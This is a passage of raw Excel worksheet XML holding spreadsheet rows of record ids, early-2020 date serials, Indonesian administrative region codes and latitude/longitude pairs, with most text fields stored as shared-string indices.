        <v>-697261</v>
      </c>
      <c r="X729" t="s">
        <v>18931</v>
      </c>
      <c r="Y729" t="str">
        <f t="shared" si="11"/>
        <v>-6.97261,107.57309</v>
      </c>
    </row>
    <row r="730" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A730">
        <v>105856</v>
      </c>
      <c r="B730" s="1">
        <v>43878</v>
      </c>
      <c r="C730">
        <v>0</v>
      </c>
      <c r="D730" t="s">
        <v>85</v>
      </c>
      <c r="E730" t="s">
        <v>23</v>
      </c>
      <c r="F730" t="s">
        <v>2957</v>
      </c>
      <c r="G730" t="s">
        <v>2958</v>
      </c>
      <c r="H730" t="s">
        <v>26</v>
      </c>
      <c r="J730" t="s">
        <v>2627</v>
      </c>
      <c r="K730" t="s">
        <v>2959</v>
      </c>
      <c r="L730" t="s">
        <v>2960</v>
      </c>
      <c r="M730">
        <v>3211010009</v>
      </c>
      <c r="N730">
        <v>3211010</v>
      </c>
      <c r="O730">
        <v>3211</v>
      </c>
      <c r="P730">
        <v>32</v>
      </c>
      <c r="Q730" t="s">
        <v>2951</v>
      </c>
      <c r="R730" t="s">
        <v>2952</v>
      </c>
      <c r="S730" t="s">
        <v>1797</v>
      </c>
      <c r="T730" t="s">
        <v>42</v>
      </c>
      <c r="U730" s="5">
        <v>10777668</v>
      </c>
      <c r="V730" s="5" t="s">
        <v>15129</v>
      </c>
      <c r="W730" s="5">
        <v>-694315</v>
      </c>
      <c r="X730" t="s">
        <v>18930</v>
      </c>
      <c r="Y730" t="str">
        <f t="shared" si="11"/>
        <v>-6.94315,107.77668</v>
      </c>
    </row>
    <row r="731" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A731">
        <v>105860</v>
      </c>
      <c r="B731" s="1">
        <v>43878</v>
      </c>
      <c r="C731">
        <v>0</v>
      </c>
      <c r="D731" t="s">
        <v>22</v>
      </c>
      <c r="E731" t="s">
        <v>23</v>
      </c>
      <c r="F731" t="s">
        <v>2961</v>
      </c>
      <c r="H731" t="s">
        <v>26</v>
      </c>
      <c r="I731" t="s">
        <v>2962</v>
      </c>
      <c r="J731" t="s">
        <v>2627</v>
      </c>
      <c r="L731" t="s">
        <v>2963</v>
      </c>
      <c r="M731">
        <v>3273100006</v>
      </c>
      <c r="N731">
        <v>3273100</v>
      </c>
      <c r="O731">
        <v>3273</v>
      </c>
      <c r="P731">
        <v>32</v>
      </c>
      <c r="Q731" t="s">
        <v>2964</v>
      </c>
      <c r="R731" t="s">
        <v>1463</v>
      </c>
      <c r="S731" t="s">
        <v>1464</v>
      </c>
      <c r="T731" t="s">
        <v>42</v>
      </c>
      <c r="U731" s="5">
        <v>10766386</v>
      </c>
      <c r="V731" s="5" t="s">
        <v>15131</v>
      </c>
      <c r="W731" s="5">
        <v>-696509</v>
      </c>
      <c r="X731" t="s">
        <v>18932</v>
      </c>
      <c r="Y731" t="str">
        <f t="shared" si="11"/>
        <v>-6.96509,107.66386</v>
      </c>
    </row>
    <row r="732" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A732">
        <v>106390</v>
      </c>
      <c r="B732" s="1">
        <v>43880</v>
      </c>
      <c r="C732">
        <v>0</v>
      </c>
      <c r="D732" t="s">
        <v>22</v>
      </c>
      <c r="E732" t="s">
        <v>23</v>
      </c>
      <c r="F732" t="s">
        <v>2965</v>
      </c>
      <c r="H732" t="s">
        <v>26</v>
      </c>
      <c r="I732" t="s">
        <v>2966</v>
      </c>
      <c r="J732" t="s">
        <v>2967</v>
      </c>
      <c r="L732" t="s">
        <v>2968</v>
      </c>
      <c r="M732">
        <v>3175888888</v>
      </c>
      <c r="N732">
        <v>3175888</v>
      </c>
      <c r="O732">
        <v>3175</v>
      </c>
      <c r="P732">
        <v>31</v>
      </c>
      <c r="Q732" t="s">
        <v>2969</v>
      </c>
      <c r="R732" t="s">
        <v>2969</v>
      </c>
      <c r="S732" t="s">
        <v>547</v>
      </c>
      <c r="T732" t="s">
        <v>33</v>
      </c>
      <c r="U732" s="5">
        <v>10685817</v>
      </c>
      <c r="V732" s="5" t="s">
        <v>15132</v>
      </c>
      <c r="W732" s="5">
        <v>-615252</v>
      </c>
      <c r="X732" t="s">
        <v>18933</v>
      </c>
      <c r="Y732" t="str">
        <f t="shared" si="11"/>
        <v>-6.15252,106.85817</v>
      </c>
    </row>
    <row r="733" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A733">
        <v>106392</v>
      </c>
      <c r="B733" s="1">
        <v>43880</v>
      </c>
      <c r="C733">
        <v>1</v>
      </c>
      <c r="D733" t="s">
        <v>22</v>
      </c>
      <c r="E733" t="s">
        <v>23</v>
      </c>
      <c r="F733" t="s">
        <v>2970</v>
      </c>
      <c r="H733" t="s">
        <v>26</v>
      </c>
      <c r="I733" t="s">
        <v>1604</v>
      </c>
      <c r="J733" t="s">
        <v>2590</v>
      </c>
      <c r="L733" t="s">
        <v>2971</v>
      </c>
      <c r="M733">
        <v>3173020002</v>
      </c>
      <c r="N733">
        <v>3173020</v>
      </c>
      <c r="O733">
        <v>3173</v>
      </c>
      <c r="P733">
        <v>31</v>
      </c>
      <c r="Q733" t="s">
        <v>2592</v>
      </c>
      <c r="R733" t="s">
        <v>179</v>
      </c>
      <c r="S733" t="s">
        <v>62</v>
      </c>
      <c r="T733" t="s">
        <v>33</v>
      </c>
      <c r="U733" s="5">
        <v>10684998</v>
      </c>
      <c r="V733" s="5" t="s">
        <v>15133</v>
      </c>
      <c r="W733" s="5">
        <v>-620145</v>
      </c>
      <c r="X733" t="s">
        <v>18934</v>
      </c>
      <c r="Y733" t="str">
        <f t="shared" si="11"/>
        <v>-6.20145,106.84998</v>
      </c>
    </row>
    <row r="734" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A734">
        <v>106393</v>
      </c>
      <c r="B734" s="1">
        <v>43881</v>
      </c>
      <c r="C734">
        <v>0</v>
      </c>
      <c r="D734" t="s">
        <v>22</v>
      </c>
      <c r="E734" t="s">
        <v>23</v>
      </c>
      <c r="F734" t="s">
        <v>2972</v>
      </c>
      <c r="G734" t="s">
        <v>2973</v>
      </c>
      <c r="H734" t="s">
        <v>26</v>
      </c>
      <c r="I734" t="s">
        <v>1683</v>
      </c>
      <c r="J734" t="s">
        <v>2608</v>
      </c>
      <c r="L734" t="s">
        <v>2974</v>
      </c>
      <c r="M734">
        <v>3320080004</v>
      </c>
      <c r="N734">
        <v>3320080</v>
      </c>
      <c r="O734">
        <v>3320</v>
      </c>
      <c r="P734">
        <v>33</v>
      </c>
      <c r="Q734" t="s">
        <v>2975</v>
      </c>
      <c r="R734" t="s">
        <v>2976</v>
      </c>
      <c r="S734" t="s">
        <v>2976</v>
      </c>
      <c r="T734" t="s">
        <v>1134</v>
      </c>
      <c r="U734" s="5">
        <v>11066711</v>
      </c>
      <c r="V734" s="5" t="s">
        <v>15134</v>
      </c>
      <c r="W734" s="5">
        <v>-659151</v>
      </c>
      <c r="X734" t="s">
        <v>18935</v>
      </c>
      <c r="Y734" t="str">
        <f t="shared" si="11"/>
        <v>-6.59151,110.66711</v>
      </c>
    </row>
    <row r="735" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A735">
        <v>106393</v>
      </c>
      <c r="B735" s="1">
        <v>43881</v>
      </c>
      <c r="C735">
        <v>0</v>
      </c>
      <c r="D735" t="s">
        <v>22</v>
      </c>
      <c r="E735" t="s">
        <v>23</v>
      </c>
      <c r="F735" t="s">
        <v>2972</v>
      </c>
      <c r="G735" t="s">
        <v>2973</v>
      </c>
      <c r="H735" t="s">
        <v>26</v>
      </c>
      <c r="I735" t="s">
        <v>1683</v>
      </c>
      <c r="J735" t="s">
        <v>2608</v>
      </c>
      <c r="L735" t="s">
        <v>2974</v>
      </c>
      <c r="M735">
        <v>3320080004</v>
      </c>
      <c r="N735">
        <v>3320080</v>
      </c>
      <c r="O735">
        <v>3320</v>
      </c>
      <c r="P735">
        <v>33</v>
      </c>
      <c r="Q735" t="s">
        <v>2975</v>
      </c>
      <c r="R735" t="s">
        <v>2976</v>
      </c>
      <c r="S735" t="s">
        <v>2976</v>
      </c>
      <c r="T735" t="s">
        <v>1134</v>
      </c>
      <c r="U735" s="5">
        <v>11066711</v>
      </c>
      <c r="V735" s="5" t="s">
        <v>15134</v>
      </c>
      <c r="W735" s="5">
        <v>-659151</v>
      </c>
      <c r="X735" t="s">
        <v>18935</v>
      </c>
      <c r="Y735" t="str">
        <f t="shared" si="11"/>
        <v>-6.59151,110.66711</v>
      </c>
    </row>
    <row r="736" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A736">
        <v>106394</v>
      </c>
      <c r="B736" s="1">
        <v>43881</v>
      </c>
      <c r="C736">
        <v>0</v>
      </c>
      <c r="D736" t="s">
        <v>22</v>
      </c>
      <c r="E736" t="s">
        <v>23</v>
      </c>
      <c r="F736" t="s">
        <v>2977</v>
      </c>
      <c r="H736" t="s">
        <v>26</v>
      </c>
      <c r="I736" t="s">
        <v>882</v>
      </c>
      <c r="J736" t="s">
        <v>2627</v>
      </c>
      <c r="L736" t="s">
        <v>2978</v>
      </c>
      <c r="M736">
        <v>3216090001</v>
      </c>
      <c r="N736">
        <v>3216090</v>
      </c>
      <c r="O736">
        <v>3216</v>
      </c>
      <c r="P736">
        <v>32</v>
      </c>
      <c r="Q736" t="s">
        <v>334</v>
      </c>
      <c r="R736" t="s">
        <v>335</v>
      </c>
      <c r="S736" t="s">
        <v>41</v>
      </c>
      <c r="T736" t="s">
        <v>42</v>
      </c>
      <c r="U736" s="5">
        <v>10701201</v>
      </c>
      <c r="V736" s="5" t="s">
        <v>15135</v>
      </c>
      <c r="W736" s="5">
        <v>-618004</v>
      </c>
      <c r="X736" t="s">
        <v>18936</v>
      </c>
      <c r="Y736" t="str">
        <f t="shared" si="11"/>
        <v>-6.18004,107.01201</v>
      </c>
    </row>
    <row r="737" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A737">
        <v>106394</v>
      </c>
      <c r="B737" s="1">
        <v>43881</v>
      </c>
      <c r="C737">
        <v>0</v>
      </c>
      <c r="D737" t="s">
        <v>22</v>
      </c>
      <c r="E737" t="s">
        <v>23</v>
      </c>
      <c r="F737" t="s">
        <v>2977</v>
      </c>
      <c r="H737" t="s">
        <v>26</v>
      </c>
      <c r="I737" t="s">
        <v>882</v>
      </c>
      <c r="J737" t="s">
        <v>2627</v>
      </c>
      <c r="L737" t="s">
        <v>2978</v>
      </c>
      <c r="M737">
        <v>3216090001</v>
      </c>
      <c r="N737">
        <v>3216090</v>
      </c>
      <c r="O737">
        <v>3216</v>
      </c>
      <c r="P737">
        <v>32</v>
      </c>
      <c r="Q737" t="s">
        <v>334</v>
      </c>
      <c r="R737" t="s">
        <v>335</v>
      </c>
      <c r="S737" t="s">
        <v>41</v>
      </c>
      <c r="T737" t="s">
        <v>42</v>
      </c>
      <c r="U737" s="5">
        <v>10701201</v>
      </c>
      <c r="V737" s="5" t="s">
        <v>15135</v>
      </c>
      <c r="W737" s="5">
        <v>-618004</v>
      </c>
      <c r="X737" t="s">
        <v>18936</v>
      </c>
      <c r="Y737" t="str">
        <f t="shared" si="11"/>
        <v>-6.18004,107.01201</v>
      </c>
    </row>
    <row r="738" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A738">
        <v>106396</v>
      </c>
      <c r="B738" s="1">
        <v>43881</v>
      </c>
      <c r="C738">
        <v>0</v>
      </c>
      <c r="D738" t="s">
        <v>22</v>
      </c>
      <c r="E738" t="s">
        <v>23</v>
      </c>
      <c r="F738" t="s">
        <v>2979</v>
      </c>
      <c r="H738" t="s">
        <v>26</v>
      </c>
      <c r="I738" t="s">
        <v>1809</v>
      </c>
      <c r="J738" t="s">
        <v>2627</v>
      </c>
      <c r="L738" t="s">
        <v>2980</v>
      </c>
      <c r="M738">
        <v>3275041004</v>
      </c>
      <c r="N738">
        <v>3275041</v>
      </c>
      <c r="O738">
        <v>3275</v>
      </c>
      <c r="P738">
        <v>32</v>
      </c>
      <c r="Q738" t="s">
        <v>133</v>
      </c>
      <c r="R738" t="s">
        <v>134</v>
      </c>
      <c r="S738" t="s">
        <v>41</v>
      </c>
      <c r="T738" t="s">
        <v>42</v>
      </c>
      <c r="U738" s="5">
        <v>10700857</v>
      </c>
      <c r="V738" s="5" t="s">
        <v>15136</v>
      </c>
      <c r="W738" s="5">
        <v>-626569</v>
      </c>
      <c r="X738" t="s">
        <v>18937</v>
      </c>
      <c r="Y738" t="str">
        <f t="shared" si="11"/>
        <v>-6.26569,107.00857</v>
      </c>
    </row>
    <row r="739" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A739">
        <v>106396</v>
      </c>
      <c r="B739" s="1">
        <v>43881</v>
      </c>
      <c r="C739">
        <v>0</v>
      </c>
      <c r="D739" t="s">
        <v>22</v>
      </c>
      <c r="E739" t="s">
        <v>23</v>
      </c>
      <c r="F739" t="s">
        <v>2979</v>
      </c>
      <c r="H739" t="s">
        <v>26</v>
      </c>
      <c r="I739" t="s">
        <v>1809</v>
      </c>
      <c r="J739" t="s">
        <v>2627</v>
      </c>
      <c r="L739" t="s">
        <v>2980</v>
      </c>
      <c r="M739">
        <v>3275041004</v>
      </c>
      <c r="N739">
        <v>3275041</v>
      </c>
      <c r="O739">
        <v>3275</v>
      </c>
      <c r="P739">
        <v>32</v>
      </c>
      <c r="Q739" t="s">
        <v>133</v>
      </c>
      <c r="R739" t="s">
        <v>134</v>
      </c>
      <c r="S739" t="s">
        <v>41</v>
      </c>
      <c r="T739" t="s">
        <v>42</v>
      </c>
      <c r="U739" s="5">
        <v>10700857</v>
      </c>
      <c r="V739" s="5" t="s">
        <v>15136</v>
      </c>
      <c r="W739" s="5">
        <v>-626569</v>
      </c>
      <c r="X739" t="s">
        <v>18937</v>
      </c>
      <c r="Y739" t="str">
        <f t="shared" si="11"/>
        <v>-6.26569,107.00857</v>
      </c>
    </row>
    <row r="740" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A740">
        <v>106413</v>
      </c>
      <c r="B740" s="1">
        <v>43881</v>
      </c>
      <c r="C740">
        <v>0</v>
      </c>
      <c r="D740" t="s">
        <v>85</v>
      </c>
      <c r="E740" t="s">
        <v>23</v>
      </c>
      <c r="F740" t="s">
        <v>2981</v>
      </c>
      <c r="G740" t="s">
        <v>2982</v>
      </c>
      <c r="H740" t="s">
        <v>26</v>
      </c>
      <c r="J740" t="s">
        <v>2608</v>
      </c>
      <c r="K740" t="s">
        <v>2983</v>
      </c>
      <c r="L740" t="s">
        <v>2984</v>
      </c>
      <c r="M740">
        <v>3318040018</v>
      </c>
      <c r="N740">
        <v>3318040</v>
      </c>
      <c r="O740">
        <v>3318</v>
      </c>
      <c r="P740">
        <v>33</v>
      </c>
      <c r="Q740" t="s">
        <v>2985</v>
      </c>
      <c r="R740" t="s">
        <v>2985</v>
      </c>
      <c r="S740" t="s">
        <v>2986</v>
      </c>
      <c r="T740" t="s">
        <v>1134</v>
      </c>
      <c r="U740" s="5">
        <v>11110174</v>
      </c>
      <c r="V740" s="5" t="s">
        <v>15137</v>
      </c>
      <c r="W740" s="5">
        <v>-680686</v>
      </c>
      <c r="X740" t="s">
        <v>18938</v>
      </c>
      <c r="Y740" t="str">
        <f t="shared" si="11"/>
        <v>-6.80686,111.10174</v>
      </c>
    </row>
    <row r="741" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A741">
        <v>106413</v>
      </c>
      <c r="B741" s="1">
        <v>43881</v>
      </c>
      <c r="C741">
        <v>0</v>
      </c>
      <c r="D741" t="s">
        <v>85</v>
      </c>
      <c r="E741" t="s">
        <v>23</v>
      </c>
      <c r="F741" t="s">
        <v>2981</v>
      </c>
      <c r="G741" t="s">
        <v>2982</v>
      </c>
      <c r="H741" t="s">
        <v>26</v>
      </c>
      <c r="J741" t="s">
        <v>2608</v>
      </c>
      <c r="K741" t="s">
        <v>2983</v>
      </c>
      <c r="L741" t="s">
        <v>2984</v>
      </c>
      <c r="M741">
        <v>3318040018</v>
      </c>
      <c r="N741">
        <v>3318040</v>
      </c>
      <c r="O741">
        <v>3318</v>
      </c>
      <c r="P741">
        <v>33</v>
      </c>
      <c r="Q741" t="s">
        <v>2985</v>
      </c>
      <c r="R741" t="s">
        <v>2985</v>
      </c>
      <c r="S741" t="s">
        <v>2986</v>
      </c>
      <c r="T741" t="s">
        <v>1134</v>
      </c>
      <c r="U741" s="5">
        <v>11110174</v>
      </c>
      <c r="V741" s="5" t="s">
        <v>15137</v>
      </c>
      <c r="W741" s="5">
        <v>-680686</v>
      </c>
      <c r="X741" t="s">
        <v>18938</v>
      </c>
      <c r="Y741" t="str">
        <f t="shared" si="11"/>
        <v>-6.80686,111.10174</v>
      </c>
    </row>
    <row r="742" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A742">
        <v>106420</v>
      </c>
      <c r="B742" s="1">
        <v>43881</v>
      </c>
      <c r="C742">
        <v>0</v>
      </c>
      <c r="D742" t="s">
        <v>22</v>
      </c>
      <c r="E742" t="s">
        <v>23</v>
      </c>
      <c r="F742" t="s">
        <v>2987</v>
      </c>
      <c r="G742" t="s">
        <v>2988</v>
      </c>
      <c r="H742" t="s">
        <v>26</v>
      </c>
      <c r="I742" t="s">
        <v>1633</v>
      </c>
      <c r="J742" t="s">
        <v>2989</v>
      </c>
      <c r="L742" t="s">
        <v>2990</v>
      </c>
      <c r="M742">
        <v>3374080012</v>
      </c>
      <c r="N742">
        <v>3374080</v>
      </c>
      <c r="O742">
        <v>3374</v>
      </c>
      <c r="P742">
        <v>33</v>
      </c>
      <c r="Q742" t="s">
        <v>2991</v>
      </c>
      <c r="R742" t="s">
        <v>2992</v>
      </c>
      <c r="S742" t="s">
        <v>1334</v>
      </c>
      <c r="T742" t="s">
        <v>1134</v>
      </c>
      <c r="U742" s="5">
        <v>11046051</v>
      </c>
      <c r="V742" s="5" t="s">
        <v>15138</v>
      </c>
      <c r="W742" s="5">
        <v>-697380</v>
      </c>
      <c r="X742" t="s">
        <v>18939</v>
      </c>
      <c r="Y742" t="str">
        <f t="shared" si="11"/>
        <v>-6.97380,110.46051</v>
      </c>
    </row>
    <row r="743" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A743">
        <v>106512</v>
      </c>
      <c r="B743" s="1">
        <v>43881</v>
      </c>
      <c r="C743">
        <v>0</v>
      </c>
      <c r="D743" t="s">
        <v>22</v>
      </c>
      <c r="E743" t="s">
        <v>23</v>
      </c>
      <c r="F743" t="s">
        <v>2993</v>
      </c>
      <c r="H743" t="s">
        <v>26</v>
      </c>
      <c r="I743" t="s">
        <v>1389</v>
      </c>
      <c r="J743" t="s">
        <v>2994</v>
      </c>
      <c r="L743" t="s">
        <v>2995</v>
      </c>
      <c r="M743">
        <v>3374140016</v>
      </c>
      <c r="N743">
        <v>3374140</v>
      </c>
      <c r="O743">
        <v>3374</v>
      </c>
      <c r="P743">
        <v>33</v>
      </c>
      <c r="Q743" t="s">
        <v>2996</v>
      </c>
      <c r="R743" t="s">
        <v>2997</v>
      </c>
      <c r="S743" t="s">
        <v>1334</v>
      </c>
      <c r="T743" t="s">
        <v>1134</v>
      </c>
      <c r="U743" s="5">
        <v>11039903</v>
      </c>
      <c r="V743" s="5" t="s">
        <v>15139</v>
      </c>
      <c r="W743" s="5">
        <v>-696234</v>
      </c>
      <c r="X743" t="s">
        <v>18940</v>
      </c>
      <c r="Y743" t="str">
        <f t="shared" si="11"/>
        <v>-6.96234,110.39903</v>
      </c>
    </row>
    <row r="744" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A744">
        <v>106531</v>
      </c>
      <c r="B744" s="1">
        <v>43881</v>
      </c>
      <c r="C744">
        <v>0</v>
      </c>
      <c r="D744" t="s">
        <v>22</v>
      </c>
      <c r="E744" t="s">
        <v>23</v>
      </c>
      <c r="F744" t="s">
        <v>2998</v>
      </c>
      <c r="H744" t="s">
        <v>26</v>
      </c>
      <c r="I744" t="s">
        <v>1559</v>
      </c>
      <c r="J744" t="s">
        <v>2999</v>
      </c>
      <c r="L744" t="s">
        <v>3000</v>
      </c>
      <c r="M744">
        <v>3374080012</v>
      </c>
      <c r="N744">
        <v>3374080</v>
      </c>
      <c r="O744">
        <v>3374</v>
      </c>
      <c r="P744">
        <v>33</v>
      </c>
      <c r="Q744" t="s">
        <v>2991</v>
      </c>
      <c r="R744" t="s">
        <v>2992</v>
      </c>
      <c r="S744" t="s">
        <v>1334</v>
      </c>
      <c r="T744" t="s">
        <v>1134</v>
      </c>
      <c r="U744" s="5">
        <v>11045962</v>
      </c>
      <c r="V744" s="5" t="s">
        <v>15140</v>
      </c>
      <c r="W744" s="5">
        <v>-697446</v>
      </c>
      <c r="X744" t="s">
        <v>18941</v>
      </c>
      <c r="Y744" t="str">
        <f t="shared" si="11"/>
        <v>-6.97446,110.45962</v>
      </c>
    </row>
    <row r="745" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A745">
        <v>107078</v>
      </c>
      <c r="B745" s="1">
        <v>43882</v>
      </c>
      <c r="C745">
        <v>0</v>
      </c>
      <c r="D745" t="s">
        <v>22</v>
      </c>
      <c r="E745" t="s">
        <v>23</v>
      </c>
      <c r="F745" t="s">
        <v>3001</v>
      </c>
      <c r="G745" t="s">
        <v>3002</v>
      </c>
      <c r="H745" t="s">
        <v>26</v>
      </c>
      <c r="I745" t="s">
        <v>592</v>
      </c>
      <c r="J745" t="s">
        <v>3003</v>
      </c>
      <c r="L745" t="s">
        <v>3004</v>
      </c>
      <c r="M745">
        <v>3374080012</v>
      </c>
      <c r="N745">
        <v>3374080</v>
      </c>
      <c r="O745">
        <v>3374</v>
      </c>
      <c r="P745">
        <v>33</v>
      </c>
      <c r="Q745" t="s">
        <v>2991</v>
      </c>
      <c r="R745" t="s">
        <v>2992</v>
      </c>
      <c r="S745" t="s">
        <v>1334</v>
      </c>
      <c r="T745" t="s">
        <v>1134</v>
      </c>
      <c r="U745" s="5">
        <v>11045452</v>
      </c>
      <c r="V745" s="5" t="s">
        <v>15141</v>
      </c>
      <c r="W745" s="5">
        <v>-697507</v>
      </c>
      <c r="X745" t="s">
        <v>18942</v>
      </c>
      <c r="Y745" t="str">
        <f t="shared" si="11"/>
        <v>-6.97507,110.45452</v>
      </c>
    </row>
    <row r="746" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A746">
        <v>107458</v>
      </c>
      <c r="B746" s="1">
        <v>43882</v>
      </c>
      <c r="C746">
        <v>1</v>
      </c>
      <c r="D746" t="s">
        <v>22</v>
      </c>
      <c r="E746" t="s">
        <v>23</v>
      </c>
      <c r="F746" t="s">
        <v>3005</v>
      </c>
      <c r="H746" t="s">
        <v>26</v>
      </c>
      <c r="I746" t="s">
        <v>27</v>
      </c>
      <c r="J746" t="s">
        <v>3006</v>
      </c>
      <c r="L746" t="s">
        <v>3007</v>
      </c>
      <c r="M746">
        <v>3173020001</v>
      </c>
      <c r="N746">
        <v>3173020</v>
      </c>
      <c r="O746">
        <v>3173</v>
      </c>
      <c r="P746">
        <v>31</v>
      </c>
      <c r="Q746" t="s">
        <v>179</v>
      </c>
      <c r="R746" t="s">
        <v>179</v>
      </c>
      <c r="S746" t="s">
        <v>62</v>
      </c>
      <c r="T746" t="s">
        <v>33</v>
      </c>
      <c r="U746" s="5">
        <v>10682611</v>
      </c>
      <c r="V746" s="5" t="s">
        <v>15142</v>
      </c>
      <c r="W746" s="5">
        <v>-619986</v>
      </c>
      <c r="X746" t="s">
        <v>18943</v>
      </c>
      <c r="Y746" t="str">
        <f t="shared" si="11"/>
        <v>-6.19986,106.82611</v>
      </c>
    </row>
    <row r="747" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A747">
        <v>107498</v>
      </c>
      <c r="B747" s="1">
        <v>43882</v>
      </c>
      <c r="C747">
        <v>1</v>
      </c>
      <c r="D747" t="s">
        <v>22</v>
      </c>
      <c r="E747" t="s">
        <v>23</v>
      </c>
      <c r="F747" t="s">
        <v>3008</v>
      </c>
      <c r="H747" t="s">
        <v>26</v>
      </c>
      <c r="I747" t="s">
        <v>2196</v>
      </c>
      <c r="J747" t="s">
        <v>3009</v>
      </c>
      <c r="L747" t="s">
        <v>3010</v>
      </c>
      <c r="M747">
        <v>3174040003</v>
      </c>
      <c r="N747">
        <v>3174040</v>
      </c>
      <c r="O747">
        <v>3174</v>
      </c>
      <c r="P747">
        <v>31</v>
      </c>
      <c r="Q747" t="s">
        <v>3011</v>
      </c>
      <c r="R747" t="s">
        <v>377</v>
      </c>
      <c r="S747" t="s">
        <v>32</v>
      </c>
      <c r="T747" t="s">
        <v>33</v>
      </c>
      <c r="U747" s="5">
        <v>10680180</v>
      </c>
      <c r="V747" s="5" t="s">
        <v>15143</v>
      </c>
      <c r="W747" s="5">
        <v>-616958</v>
      </c>
      <c r="X747" t="s">
        <v>18944</v>
      </c>
      <c r="Y747" t="str">
        <f t="shared" si="11"/>
        <v>-6.16958,106.80180</v>
      </c>
    </row>
    <row r="748" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A748">
        <v>107847</v>
      </c>
      <c r="B748" s="1">
        <v>43883</v>
      </c>
      <c r="C748">
        <v>0</v>
      </c>
      <c r="D748" t="s">
        <v>22</v>
      </c>
      <c r="E748" t="s">
        <v>23</v>
      </c>
      <c r="F748" t="s">
        <v>3012</v>
      </c>
      <c r="H748" t="s">
        <v>26</v>
      </c>
      <c r="I748" t="s">
        <v>834</v>
      </c>
      <c r="J748" t="s">
        <v>3013</v>
      </c>
      <c r="L748" t="s">
        <v>3014</v>
      </c>
      <c r="M748">
        <v>1612020008</v>
      </c>
      <c r="N748">
        <v>1612020</v>
      </c>
      <c r="O748">
        <v>1612</v>
      </c>
      <c r="P748">
        <v>16</v>
      </c>
      <c r="Q748" t="s">
        <v>3015</v>
      </c>
      <c r="R748" t="s">
        <v>1481</v>
      </c>
      <c r="S748" t="s">
        <v>3016</v>
      </c>
      <c r="T748" t="s">
        <v>1418</v>
      </c>
      <c r="U748" s="5">
        <v>10413867</v>
      </c>
      <c r="V748" s="5" t="s">
        <v>15144</v>
      </c>
      <c r="W748" s="5">
        <v>-332407</v>
      </c>
      <c r="X748" t="s">
        <v>18945</v>
      </c>
      <c r="Y748" t="str">
        <f t="shared" si="11"/>
        <v>-3.32407,104.13867</v>
      </c>
    </row>
    <row r="749" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A749">
        <v>108006</v>
      </c>
      <c r="B749" s="1">
        <v>43883</v>
      </c>
      <c r="C749">
        <v>1</v>
      </c>
      <c r="D749" t="s">
        <v>22</v>
      </c>
      <c r="E749" t="s">
        <v>23</v>
      </c>
      <c r="F749" t="s">
        <v>3017</v>
      </c>
      <c r="G749" t="s">
        <v>3018</v>
      </c>
      <c r="H749" t="s">
        <v>26</v>
      </c>
      <c r="I749" t="s">
        <v>1624</v>
      </c>
      <c r="J749" t="s">
        <v>2622</v>
      </c>
      <c r="L749" t="s">
        <v>3019</v>
      </c>
      <c r="M749">
        <v>3578080004</v>
      </c>
      <c r="N749">
        <v>3578080</v>
      </c>
      <c r="O749">
        <v>3578</v>
      </c>
      <c r="P749">
        <v>35</v>
      </c>
      <c r="Q749" t="s">
        <v>3020</v>
      </c>
      <c r="R749" t="s">
        <v>3021</v>
      </c>
      <c r="S749" t="s">
        <v>1346</v>
      </c>
      <c r="T749" t="s">
        <v>1221</v>
      </c>
      <c r="U749" s="5">
        <v>11279714</v>
      </c>
      <c r="V749" s="5" t="s">
        <v>15145</v>
      </c>
      <c r="W749" s="5">
        <v>-727964</v>
      </c>
      <c r="X749" t="s">
        <v>18946</v>
      </c>
      <c r="Y749" t="str">
        <f t="shared" si="11"/>
        <v>-7.27964,112.79714</v>
      </c>
    </row>
    <row r="750" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A750">
        <v>108279</v>
      </c>
      <c r="B750" s="1">
        <v>43883</v>
      </c>
      <c r="C750">
        <v>1</v>
      </c>
      <c r="D750" t="s">
        <v>22</v>
      </c>
      <c r="E750" t="s">
        <v>23</v>
      </c>
      <c r="F750" t="s">
        <v>3022</v>
      </c>
      <c r="G750" t="s">
        <v>3023</v>
      </c>
      <c r="H750" t="s">
        <v>26</v>
      </c>
      <c r="I750" t="s">
        <v>3024</v>
      </c>
      <c r="J750" t="s">
        <v>3006</v>
      </c>
      <c r="L750" t="s">
        <v>3025</v>
      </c>
      <c r="M750">
        <v>3173020001</v>
      </c>
      <c r="N750">
        <v>3173020</v>
      </c>
      <c r="O750">
        <v>3173</v>
      </c>
      <c r="P750">
        <v>31</v>
      </c>
      <c r="Q750" t="s">
        <v>179</v>
      </c>
      <c r="R750" t="s">
        <v>179</v>
      </c>
      <c r="S750" t="s">
        <v>62</v>
      </c>
      <c r="T750" t="s">
        <v>33</v>
      </c>
      <c r="U750" s="5">
        <v>10682608</v>
      </c>
      <c r="V750" s="5" t="s">
        <v>15146</v>
      </c>
      <c r="W750" s="5">
        <v>-619989</v>
      </c>
      <c r="X750" t="s">
        <v>18947</v>
      </c>
      <c r="Y750" t="str">
        <f t="shared" si="11"/>
        <v>-6.19989,106.82608</v>
      </c>
    </row>
    <row r="751" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A751">
        <v>108292</v>
      </c>
      <c r="B751" s="1">
        <v>43883</v>
      </c>
      <c r="C751">
        <v>1</v>
      </c>
      <c r="D751" t="s">
        <v>22</v>
      </c>
      <c r="E751" t="s">
        <v>23</v>
      </c>
      <c r="F751" t="s">
        <v>3026</v>
      </c>
      <c r="H751" t="s">
        <v>26</v>
      </c>
      <c r="I751" t="s">
        <v>555</v>
      </c>
      <c r="J751" t="s">
        <v>2627</v>
      </c>
      <c r="L751" t="s">
        <v>3027</v>
      </c>
      <c r="M751">
        <v>3275061004</v>
